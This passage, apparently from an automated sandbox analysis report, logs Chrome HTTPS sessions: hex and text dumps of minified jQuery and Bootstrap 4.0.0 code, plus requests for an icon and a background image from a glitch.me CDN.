            2024-09-29 02:32:44 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
            Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
            2024-09-29 02:32:44 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
            Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
            2024-09-29 02:32:44 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
            Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.649735104.18.10.2074433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:44 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
            Host: maxcdn.bootstrapcdn.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:44 UTC917INHTTP/1.1 200 OK
            Date: Sun, 29 Sep 2024 02:32:44 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            CDN-PullZone: 252412
            CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
            CDN-RequestCountryCode: US
            Access-Control-Allow-Origin: *
            Cache-Control: public, max-age=31919000
            ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
            Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
            CDN-ProxyVer: 1.04
            CDN-RequestPullSuccess: True
            CDN-RequestPullCode: 200
            CDN-CachedAt: 01/15/2024 23:55:45
            CDN-EdgeStorageId: 845
            timing-allow-origin: *
            cross-origin-resource-policy: cross-origin
            X-Content-Type-Options: nosniff
            CDN-Status: 200
            CDN-RequestId: 1b67fa50f8ffc843a15d702643eb706f
            CDN-Cache: HIT
            CF-Cache-Status: HIT
            Age: 17233184
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            Server: cloudflare
            CF-RAY: 8ca8907dfdcf4234-EWR
            2024-09-29 02:32:44 UTC452INData Raw: 37 63 30 63 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
            Data Ascii: 7c0c/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
            2024-09-29 02:32:44 UTC1369INData Raw: 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 26
            Data Ascii: trap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&
            2024-09-29 02:32:44 UTC1369INData Raw: 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c 65 6d 65 6e 74 22 3a 28 6c 3d 6f 2c 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 6c 29 2e 6d 61 74 63 68
            Data Ascii: onEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":(l=o,{}.toString.call(l).match
            2024-09-29 02:32:44 UTC1369INData Raw: 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7d 2c 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 28 74
            Data Ascii: removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._destroyElement=function(t){o(t
            2024-09-29 02:32:44 UTC1369INData Raw: 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61
            Data Ascii: abled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!p(this._element).ha
            2024-09-29 02:32:44 UTC1369INData Raw: 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43 54 49 56 45 3a 22 2e 61 63 74 69 76 65 22 2c 41 43 54 49 56 45 5f 49 54 45 4d 3a 22 2e 61 63 74 69 76 65 2e 63
            Data Ascii: "touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={ACTIVE:".active",ACTIVE_ITEM:".active.c
            2024-09-29 02:32:44 UTC1369INData Raw: 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54 45 4d 29 5b 30 5d 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e
            Data Ascii: his._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_ITEM)[0];var i=this._getItemIndex(this.
            2024-09-29 02:32:44 UTC1369INData Raw: 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 3d 3d 3d 68 2c
            Data Ascii: (t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemByDirection=function(t,e){var n=t===h,
            2024-09-29 02:32:44 UTC1369INData Raw: 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22 20 22 2b 73 2b 22 20 22 2b 69 29 2c 6f 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75
            Data Ascii: });P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+" "+s+" "+i),o._isSliding=!1,setTimeou
            2024-09-29 02:32:44 UTC1369INData Raw: 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 2c 69 3d 22 2e 22 2b 6e 2c 6f 3d 74 2e 66 6e 5b 65 5d 2c 61 3d 7b 74 6f 67 67 6c 65 3a 21 30
            Data Ascii: ){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.collapse",i="."+n,o=t.fn[e],a={toggle:!0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.64974065.9.95.854433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:45 UTC384OUTGET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico HTTP/1.1
            Host: cdn.glitch.me
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:46 UTC520INHTTP/1.1 200 OK
            Content-Type: image/x-icon
            Content-Length: 41566
            Connection: close
            Date: Sun, 29 Sep 2024 02:32:46 GMT
            Cache-Control: max-age=31536000
            Last-Modified: Thu, 17 Sep 2020 21:03:07 GMT
            ETag: "692e1c7339c359b6412f059c9c9a0474"
            Server: AmazonS3
            X-Cache: Miss from cloudfront
            Via: 1.1 a1c66294cb416b399374a845b97656d2.cloudfront.net (CloudFront)
            X-Amz-Cf-Pop: PRG50-C1
            X-Amz-Cf-Id: TN0Zg3_YYZ6NS4BY7wdyDXPru_l8qrLTNzA_bDV-9gxE8Ktrd5OPsg==
            Content-Security-Policy: script-src 'none'
            Vary: Origin
            2024-09-29 02:32:46 UTC12852INData Raw: 00 00 01 00 05 00 10 10 00 00 01 00 20 00 28 05 00 00 56 00 00 00 18 18 00 00 01 00 20 00 68 0b 00 00 7e 05 00 00 20 20 00 00 01 00 20 00 28 14 00 00 e6 10 00 00 30 30 00 00 01 00 20 00 28 2d 00 00 0e 25 00 00 40 40 00 00 01 00 20 00 28 50 00 00 36 52 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
            Data Ascii: (V h~ (00 (-%@@ (P6R(
            2024-09-29 02:32:46 UTC16384INData Raw: 17 00 1a 18 17 97 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 e5 1a 18 17 04 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 4d 1a 18 17 fc 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 9f 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 6a 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 f8 1a 18 17 28 1a 18 17 00 1a 18 17 00 1a 18 17 3d 1a 18 17 fe 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 4e 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 19 1a 18 17 ee 1a 18 17 ff 1a
            Data Ascii: Mj(=N
            2024-09-29 02:32:46 UTC12176INData Raw: 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 cc 1a 18 17 0f 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 01 1a 18 17 ea 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 cd 1a 18 17 00 1a 18 17 00 1a 18 17 37 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a
            Data Ascii: 7
            2024-09-29 02:32:46 UTC154INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            18192.168.2.64974165.9.95.854433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:45 UTC382OUTGET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg HTTP/1.1
            Host: cdn.glitch.me
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:46 UTC526INHTTP/1.1 200 OK
            Content-Type: image/jpeg
            Content-Length: 117459
            Connection: close
            Date: Sun, 29 Sep 2024 02:32:44 GMT
            Cache-Control: max-age=31536000
            Last-Modified: Thu, 17 Sep 2020 21:02:53 GMT
            ETag: "6e5b76b6f1740d6d21c8d968a0364df6"
            Server: AmazonS3
            X-Cache: Hit from cloudfront
            Via: 1.1 4614c36172b2854b1e1e94af37435c8e.cloudfront.net (CloudFront)
            X-Amz-Cf-Pop: PRG50-C1
            X-Amz-Cf-Id: T0vWQLLvwfTCTCZc12EwdSQC7mWDhYFPd8JLE9JLUNGbtS-CL9p-Pw==
            Age: 2
            Content-Security-Policy: script-src 'none'
            Vary: Origin
